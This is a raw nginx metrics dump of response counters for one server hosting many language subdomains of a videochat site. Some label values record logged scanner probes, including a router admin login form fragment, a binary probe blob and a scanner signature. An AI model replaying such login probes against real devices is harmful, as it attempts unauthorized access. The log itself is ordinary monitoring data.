nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ga.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="gl.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="gl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="gu.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="gu.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="he.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="he.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="hi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="hi.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="hr.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ht.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="hu.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="hu.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="id.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="is.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="is.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="it.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="jp.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="jv.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ka.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ka.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="kk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="kk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="km.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="km.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="kn.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="kn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ko.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ko.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ko.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ky.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ky.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lb.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lb.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lo.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lo.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lt.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lv.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lv.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mg.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ml.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ml.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mn.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mr.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mrj.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mrj.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ms.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ms.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mt.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="my.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ne.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ne.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="nl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="nl.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="no.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="no.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="pa.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="pap.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="pap.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="pl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="pt.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ro.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ro.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sco.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sco.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="si.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sitemap.xml"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sr.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sr.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ssh-2.0"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="su.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sv.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sv.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sv.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sw.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sw.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ta.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ta.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="te.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="tg.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="tg.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="th.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="tl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="tr.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="tt.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="udm.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="udm.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="uk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ur.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="uz.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="vi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="vmi460104.contaboserver.net"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="xh.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="yi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="zh.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HELP",status="400",vhost="-"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HTTPVerbs.GET",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="H\\x00\\x00\\x00tj\\xA8\\x9E#D\\x98+\\xCA\\xF0\\xA7\\xBBl\\xC5\\x19\\xD7\\x8D\\xB6\\x18\\xEDJ\\x1En\\xC1\\xF9xu[l\\xF0E\\x1D-j\\xEC\\xD4xL\\xC9r\\xC9\\x15\\x10u\\xE0%\\x86Rtg\\x05fv\\x86]%\\xCC\\x80\\x0C\\xE8\\xCF\\xAE\\x00\\xB5\\xC0f\\xC8\\x8DD\\xC5\\x09\\xF4",status="400",vhost="-"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="KXFN",status="405",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MGLNDD_161.97.120.25_80",status="400",vhost="-"} 99 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="al.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="ar.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="az.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="be.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="cy.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="da.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="de.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="ee.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="el.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="eo.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="fa.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="fa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="he.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="hi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="it.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="jv.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="km.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="kn.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="lv.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="mr.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="pl.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="pt.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="www.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="yi.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="am.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="bg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="chm.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="el.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="es.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="eu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="fi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="ga.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="hu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="id.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="is.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="kk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="kn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="ky.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="lb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="lo.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="lt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="mg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="ml.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="my.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="ne.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="nl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="pt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="sk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="th.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="uz.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="xh.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="NP@H1@&save=Login&submit-url=%2Fadmin%2Flogin.asp&postSecurityFlag=35977",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="400",vhost="-"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="161.97.120.25"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="161.97.120.25:80"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="chm.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="pl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="161.97.120.25"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="3.0.3"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="5.7.31-0ubuntu0.18.04.1"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="af.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="al.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="am.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ar.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="az.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ba.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="be.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="bg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="bn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="bs.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ca.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ceb.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="cs.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="cy.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="da.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="de.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ee.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="el.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="en.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="eo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="et.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="eu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="fa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="fi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="fr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ga.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="gl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="gu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="he.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="hi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="hr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ht.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="hu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="id.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="is.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="it.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="jp.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="jv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ka.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="kk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="km.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="kn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ko.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ky.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="lb.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="lo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="lt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="lv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ml.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mrj.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ms.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="my.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ne.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="nl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="no.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="pa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="pap.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="pt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ro.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sco.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="si.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sitemap.xml"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ssh-2.0"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="su.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sw.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ta.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="te.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="tg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="th.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="tl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="tr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="tt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="udm.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="uk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ur.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="uz.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="vi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="vmi460104.contaboserver.net"} 1 